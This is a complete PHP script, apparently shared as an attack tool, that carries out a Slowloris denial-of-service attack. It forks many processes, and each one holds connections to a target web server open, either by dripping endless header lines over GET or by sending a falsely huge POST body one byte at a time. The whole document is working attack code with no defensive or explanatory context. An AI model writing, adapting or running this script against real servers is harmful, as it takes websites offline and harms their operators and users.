SlowLoris Shell

1. <?php
2. /* PHP Slowloris
3. * Created by Reckz0r
4. * Contains get based attack (slow headers) and post based attack (long content length)
5. *
6. * Author: Reck/Reckz0r
7. */
8.  
9. function usage($argv){
10. print "Usage: ./{$argv[0]} <get or post> <number of processes> <server> [host]\n";
11. die();
12. }
13.  
14. function attack_get($server, $host){
15. $request = "GET / HTTP/1.1\r\n";
16. $request .= "Host: $host\r\n";
17. $request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n";
18. $request .= "Keep-Alive: 900\r\n";
19. $request .= "Content-Length: " . rand(1, 1000000) . "\r\n";
20. $request .= "Accept: *.*\r\n";
21. $request .= "X-a: " . rand(1, 10000) . "\r\n";
22.  
23. $sockfd = @fsockopen($server, 80, $errno, $errstr);
24. @fwrite($sockfd, $request);
25.  
26. while (true){
27. if (@fwrite($sockfd, "X-c:" . rand(1, 100000) . "\r\n")){
28. echo ".";
29. sleep(15);
30. }else{
31. echo "\nOne get attack failed to sent...\n";
32. $sockfd = @fsockopen($server, 80, $errno, $errstr);
33. @fwrite($sockfd, $request);
34. }
35. }
36.  
37. }
38.  
39. function attack_post($server, $host){
40. $request = "POST /".md5(rand())." HTTP/1.1\r\n";
41. $request .= "Host: $host\r\n";
42. $request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n";
43. $request .= "Keep-Alive: 900\r\n";
44. $request .= "Content-Length: 1000000000\r\n";
45. $request .= "Content-Type: application/x-www-form-urlencoded\r\n";
46. $request .= "Accept: *.*\r\n";
47.  
48. $sockfd = @fsockopen($server, 80, $errno, $errstr);
49. @fwrite($sockfd, $request);
50.  
51. while (true){
52. if (@fwrite($sockfd, ".") !== FALSE){
53. echo ".";
54. sleep(1);
55. }else{
56. echo "\nOne post attack failed to sent...\n";
57. $sockfd = @fsockopen($server, 80, $errno, $errstr);
58. @fwrite($sockfd, $request);
59. }
60. }
61.  
62. }
63.  
64. function main($argc, $argv){
65. $status = 1;
66.  
67. if ($argc == 4){
68. $argv[4] = $argv[3];
69. }else if ($argc < 5){
70. usage($argv);
71. }
72.  
73. $pids = array();
74.  
75. for ($i = 0; $i < $argv[2]; $i++){
76. $pid = pcntl_fork();
77.  
78. if ($pid == -1){
79. die("Error forking!\n");
80. }else if ($pid == 0){
81. //child process
82. if ($argv[1] == 'post') {
83. attack_post($argv[3], $argv[4]);
84. }elseif ($argv[1] == 'get') {
85. attack_get($argv[3], $argv[4]);
86. }else{
87. die("Invalid method, use 'get' or 'post'\n");
88. }
89. exit(0);
90. }else{
91. //parent process
92. $pids[] = $pid;
93. }
94. }
95.  
96. foreach ($pids as $pid){
97. pcntl_waitpid($pid, $status);
98. }
99. }
100.  
101.  
102. main($argc, $argv);